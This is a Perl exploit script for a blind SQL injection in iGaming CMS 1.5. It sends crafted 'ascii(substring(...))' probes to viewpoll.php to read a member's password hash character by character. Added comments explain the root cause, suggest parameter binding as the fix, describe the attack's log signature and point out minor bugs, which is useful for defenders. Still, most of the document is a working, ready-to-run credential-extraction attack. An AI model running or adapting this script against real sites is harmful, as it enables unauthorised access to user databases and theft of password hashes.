#!/usr/bin/env perl

=pod

iGaming CMS <= 1.5 Blind SQL Injection

Author:   plucky
Email:    io.plucky@gmail.com
Web Site: http://plucky.heliohost.org
Crew :    WarWolfZ

Usage:    perl exploit.pl
Example:  perl exploit.pl http://website.net/iGamingCMS1.5/ 1

Vulnerability: polls.class.php [line 10-17]

    if (!empty($_REQUEST['id'])) {
        $poll = $db->Execute(" SELECT id,title FROM `sp_polls` WHERE `id` = '" . $_REQUEST['id'] . "'");
        $result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id");

THX TO: shrod and warwolfz crew

=cut

# Root cause (from the quoted polls.class.php snippet): the request parameter
# `id` is concatenated into two SQL strings with no type check or escaping, so
# a single quote in `id` breaks out of the string literal.  The fix on the CMS
# side is to bind `id` as a parameter (prepared statement) or cast it to an
# integer before it reaches the query; see the `ascii(substring(...))` probe in
# run_exploit() below for what an attacker's `id` value looks like in the logs.

use strict;
use warnings;
use LWP::Simple;

# File-scoped state, filled in from @ARGV at the bottom of the script.
my $password        = '';   # the 32 hex characters read back from `pass`
my $vulnerable_page = '';   # base URL of the installation ($ARGV[0])
my $target_id       = 1;    # value compared against sp_members.id ($ARGV[1])

# Print the banner.  Reads the file-scoped $target_id, which is already set
# from @ARGV by the time this is called.
sub header_exploit {
    print 'iGaming CMS <= 1.5 Blind SQL Injection' . "\n".
          '-----------------------------------------' . "\n".
          'Author: plucky' . "\n".
          'Email: io.plucky@gmail.com' . "\n".
          '-----------------------------------------' . "\n".
          '[!]Target id: '.$target_id . "\n".
          '[!]Exploit Status: Working...' . "\n";
}

# Print the usage text and exit.  Called (via `||`) when either argument is
# missing or false.  NOTE: the example lines concatenate ' perl', $0 and the
# URL with no separating spaces, so the printed examples run together.
sub usage_exploit {
    print 'Usage:' . "\n".
          ' perl exploit.pl http://[site]/[path]/ [id]' . "\n".
          'Examples:' . "\n".
          ' perl' . $0 . 'http://web_site/cms/ 1' . "\n".
          ' perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . "\n";
    exit;
}

# Boolean-oracle loop: for each of 32 positions, try the 16 hex digits until a
# probe request comes back without the word "Error" in the body; that digit is
# appended to the result.  Worst case is 32 * 16 = 512 GET requests, all to
# viewpoll.php with a quote and `ascii(substring(` in the `id` parameter — an
# easy pattern for a WAF rule or access-log alert.
#
# Arguments are passed as scalar refs: \$target_id and \$vulnerable_page.
# Returns the accumulated string (may be shorter than 32 chars if no candidate
# matched at some position).
sub run_exploit {
    my $parameter_id   = shift;
    my $parameter_page = shift;
    # These lexicals shadow the file-scoped variables of the same name.
    my $target_id       = $$parameter_id;
    my $vulnerable_page = $$parameter_page;
    my $character_id          = 1;
    my $HTML_source           = '';
    my $SQL_Injection         = '';
    my $hexadecimal_character = '';
    my $result                = '';
    my $table                 = 'sp_members';
    # ASCII codes of '0'..'9' and 'a'..'f'.
    my @hexadecimal_characters = ( 48..57, 97..102 );
    foreach $character_id ( 1..32 ) {
        character_research:
        foreach $hexadecimal_character ( @hexadecimal_characters ) {
            # `\%23` is a URL-encoded `#`, which comments out the remainder of
            # the CMS's original query.
            $SQL_Injection = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23";
            $HTML_source = get( $vulnerable_page.$SQL_Injection );
            # Any body that does not mention "Error" is taken as a hit.
            if ( $HTML_source !~ /Error/i ) {
                $result .= chr($hexadecimal_character);
                # NOTE(review): $character_id is the outer loop's variable over a
                # range; incrementing it here appears to have no effect on which
                # position the next outer iteration probes.
                $character_id++;
                last character_research;
            }
        }
    }
    return $result;
}

# Argument handling.  `|| usage_exploit` also fires on a false value, so an
# id of 0 prints the usage text instead of being used.
$vulnerable_page = $ARGV[0] || usage_exploit;
$target_id       = $ARGV[1] || usage_exploit;
header_exploit;
$password = run_exploit ( \$target_id, \$vulnerable_page );
print '[!]Password: ', $password, "\n";